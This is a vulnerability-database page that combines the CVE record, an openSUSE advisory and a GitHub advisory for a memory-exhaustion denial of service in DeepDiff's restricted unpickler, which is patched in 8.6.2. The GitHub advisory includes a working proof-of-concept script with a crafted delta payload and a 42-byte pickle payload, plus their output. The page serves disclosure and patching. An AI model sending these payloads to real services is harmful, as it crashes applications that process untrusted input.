Vulnerability-Lookup

CVE-2026-33155 (GCVE-0-2026-33155)

Vulnerability from cvelistv5 – Published: 2026-03-20 20:25 – Updated: 2026-03-24 02:03

Title

DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT

Summary

DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

GitHub_M

References

URL

Tags

	https://github.com/qlustered/deepdiff/security/ad…	x_refsource_CONFIRM
	https://github.com/qlustered/deepdiff/commit/0d07…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	seperman	deepdiff	Affected: >= 5.0.0, < 8.6.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33155",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T02:03:03.983236Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T02:03:16.623Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "deepdiff",
          "vendor": "seperman",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 8.6.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T20:25:53.405Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q"
        },
        {
          "name": "https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb"
        }
      ],
      "source": {
        "advisory": "GHSA-54jj-px8x-5w5q",
        "discovery": "UNKNOWN"
      },
      "title": "DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33155",
    "datePublished": "2026-03-20T20:25:53.405Z",
    "dateReserved": "2026-03-17T21:17:08.886Z",
    "dateUpdated": "2026-03-24T02:03:16.623Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33155",
      "date": "2026-04-14",
      "epss": "0.00055",
      "percentile": "0.17308"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33155\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T21:17:15.910\",\"lastModified\":\"2026-04-14T18:24:04.770\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2.\"},{\"lang\":\"es\",\"value\":\"DeepDiff es un proyecto centrado en la Diferencia Profunda y la b\u00fasqueda de cualquier dato de Python. Desde la versi\u00f3n 5.0.0 hasta antes de la versi\u00f3n 8.6.2, el des-serializador de pickle _RestrictedUnpickler valida qu\u00e9 clases pueden cargarse, pero no limita los argumentos de sus constructores. Algunos de los tipos en SAFE_TO_IMPORT tienen constructores que asignan memoria proporcional a su entrada (builtins.bytes, builtins.list, builtins.range). Una carga \u00fatil de pickle de 40 bytes puede forzar m\u00e1s de 10 GB de memoria, lo que provoca el bloqueo de aplicaciones que cargan objetos delta o llaman a pickle_load con datos no confiables. Este problema ha sido parcheado en la versi\u00f3n 8.6.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:qluster:deepdiff:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.0.0\",\"versionEndExcluding\":\"8.6.2\",\"matchCriteriaId\":\"F297C465-900E-44A9-9697-7E3E001D9314\"}]}]}],\"references\":[{\"url\":\"https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33155\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T02:03:03.983236Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T02:03:12.675Z\"}}], \"cna\": {\"title\": \"DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT\", \"source\": {\"advisory\": \"GHSA-54jj-px8x-5w5q\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"seperman\", \"product\": \"deepdiff\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 5.0.0, \u003c 8.6.2\"}]}], \"references\": [{\"url\": \"https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q\", \"name\": \"https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb\", \"name\": \"https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T20:25:53.405Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33155\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T02:03:16.623Z\", \"dateReserved\": \"2026-03-17T21:17:08.886Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T20:25:53.405Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

OPENSUSE-SU-2026:10417-1

Vulnerability from csaf_opensuse - Published: 2026-03-24 00:00 - Updated: 2026-03-24 00:00

Summary

python311-deepdiff-8.6.2-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: python311-deepdiff-8.6.2-1.1 on GA media

Description of the patch: These are all security issues fixed in the python311-deepdiff-8.6.2-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-10417

CVE-2026-33155

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vendor Fix To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

References

URL

Category

	https://www.suse.com/support/security/rating/	external
	https://ftp.suse.com/pub/projects/security/csaf/o…	self
	https://www.suse.com/security/cve/CVE-2026-33155/	self
	https://www.suse.com/security/cve/CVE-2026-33155	external
	https://bugzilla.suse.com/1260064	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-deepdiff-8.6.2-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-deepdiff-8.6.2-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-10417",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10417-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-33155 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-33155/"
      }
    ],
    "title": "python311-deepdiff-8.6.2-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-03-24T00:00:00Z",
      "generator": {
        "date": "2026-03-24T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:10417-1",
      "initial_release_date": "2026-03-24T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-03-24T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-deepdiff-8.6.2-1.1.aarch64",
                "product": {
                  "name": "python311-deepdiff-8.6.2-1.1.aarch64",
                  "product_id": "python311-deepdiff-8.6.2-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-deepdiff-8.6.2-1.1.aarch64",
                "product": {
                  "name": "python313-deepdiff-8.6.2-1.1.aarch64",
                  "product_id": "python313-deepdiff-8.6.2-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-deepdiff-8.6.2-1.1.ppc64le",
                "product": {
                  "name": "python311-deepdiff-8.6.2-1.1.ppc64le",
                  "product_id": "python311-deepdiff-8.6.2-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-deepdiff-8.6.2-1.1.ppc64le",
                "product": {
                  "name": "python313-deepdiff-8.6.2-1.1.ppc64le",
                  "product_id": "python313-deepdiff-8.6.2-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-deepdiff-8.6.2-1.1.s390x",
                "product": {
                  "name": "python311-deepdiff-8.6.2-1.1.s390x",
                  "product_id": "python311-deepdiff-8.6.2-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-deepdiff-8.6.2-1.1.s390x",
                "product": {
                  "name": "python313-deepdiff-8.6.2-1.1.s390x",
                  "product_id": "python313-deepdiff-8.6.2-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-deepdiff-8.6.2-1.1.x86_64",
                "product": {
                  "name": "python311-deepdiff-8.6.2-1.1.x86_64",
                  "product_id": "python311-deepdiff-8.6.2-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-deepdiff-8.6.2-1.1.x86_64",
                "product": {
                  "name": "python313-deepdiff-8.6.2-1.1.x86_64",
                  "product_id": "python313-deepdiff-8.6.2-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-deepdiff-8.6.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.aarch64"
        },
        "product_reference": "python311-deepdiff-8.6.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-deepdiff-8.6.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.ppc64le"
        },
        "product_reference": "python311-deepdiff-8.6.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-deepdiff-8.6.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.s390x"
        },
        "product_reference": "python311-deepdiff-8.6.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-deepdiff-8.6.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.x86_64"
        },
        "product_reference": "python311-deepdiff-8.6.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-deepdiff-8.6.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.aarch64"
        },
        "product_reference": "python313-deepdiff-8.6.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-deepdiff-8.6.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.ppc64le"
        },
        "product_reference": "python313-deepdiff-8.6.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-deepdiff-8.6.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.s390x"
        },
        "product_reference": "python313-deepdiff-8.6.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-deepdiff-8.6.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.x86_64"
        },
        "product_reference": "python313-deepdiff-8.6.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-33155",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-33155"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.aarch64",
          "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.s390x",
          "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.x86_64",
          "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.aarch64",
          "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.s390x",
          "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-33155",
          "url": "https://www.suse.com/security/cve/CVE-2026-33155"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1260064 for CVE-2026-33155",
          "url": "https://bugzilla.suse.com/1260064"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.aarch64",
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.s390x",
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.x86_64",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.aarch64",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.s390x",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.aarch64",
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.s390x",
            "openSUSE Tumbleweed:python311-deepdiff-8.6.2-1.1.x86_64",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.aarch64",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.s390x",
            "openSUSE Tumbleweed:python313-deepdiff-8.6.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-03-24T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-33155"
    }
  ]
}

GHSA-54JJ-PX8X-5W5Q

Vulnerability from github – Published: 2026-03-18 20:10 – Updated: 2026-04-14 21:59

Summary

DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT

Details

Summary

The pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data.

Details

CVE-2025-58367 hardened the delta class against pollution and remote code execution by converting SAFE_TO_IMPORT to a frozenset and blocking traversal. _RestrictedUnpickler.find_class only gates which classes can be loaded. It doesn't intercept REDUCE opcodes or validate what is passed to constructors.

It can be exploited in 2 ways.

1 - During pickle_load

A pickle that calls bytes(N) using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override load_reduce so any allowed class can be called.

GLOBAL builtins.bytes      (passes find_class check — serialization.py:353)
INT    10000000000          (10 billion)
TUPLE + REDUCE             → bytes(10**10) → allocates ~9.3 GB

2 - During delta application

A valid diff dict that first sets a value to a large int via values_changed, then converts it to bytes via type_changes. It works because _do_values_changed() runs before _do_type_changes() in Delta.add() in delta.py line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls new_type(current_old_value) at delta.py line 576 with no size guard.

PoC

The script uses Python's resource module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change 10**8 to 10**10 for the full 9.3 GB allocation.

import resource
import sys

def limit_memory(maxsize_mb):
    """Cap virtual memory for this process."""
    soft, hard = resource.getrlimit(resource.RLIMIT_AS)
    maxsize_bytes = maxsize_mb * 1024 * 1024
    try:
        resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))
        print(f"[*] Memory limit set to {maxsize_mb} MB")
    except ValueError:
        print("[!] Failed to set memory limit.")
        sys.exit(1)

# Load heavy imports before enforcing the limit
from deepdiff import Delta
from deepdiff.serialization import pickle_dump, pickle_load

limit_memory(1024)

# --- Delta application path ---
payload_dict = {
    'values_changed': {"root['x']": {'new_value': 10**8}},
    'type_changes': {"root['x']": {'new_type': bytes}},
}

payload1 = pickle_dump(payload_dict)
print(f"Payload size: {len(payload1)} bytes")

target = {'x': 'anything'}
try:
    result = target + Delta(payload1)
    print(f"Allocated: {len(result['x']) // 1024 // 1024} MB")
    print(f"Amplification: {len(result['x']) // len(payload1)}x")
except MemoryError:
    print("[!] MemoryError — payload tried to allocate too much")

# --- Raw pickle path ---
payload2 = (
    b"(dp0\n"
    b"S'_'\n"
    b"cbuiltins\nbytes\n"
    b"(I100000000\n"
    b"tR"
    b"s."
)

print(f"Payload size: {len(payload2)} bytes")
try:
    result2 = pickle_load(payload2)
    print(f"Allocated: {len(result2['_']) // 1024 // 1024} MB")
except MemoryError:
    print("[!] MemoryError — payload tried to allocate too much")

Output:

[*] Memory limit set to 1024 MB
Payload size: 123 bytes
Allocated: 95 MB
Amplification: 813008x
Payload size: 42 bytes
Allocated: 95 MB

Impact

Denial of service. Any application that deserializes delta objects or calls pickle_load with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn't prevent resource exhaustion.

The amplification is large. 800,000x for delta and 2,000,000x for raw pickle.

Impacted users are anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 8.6.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "deepdiff"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
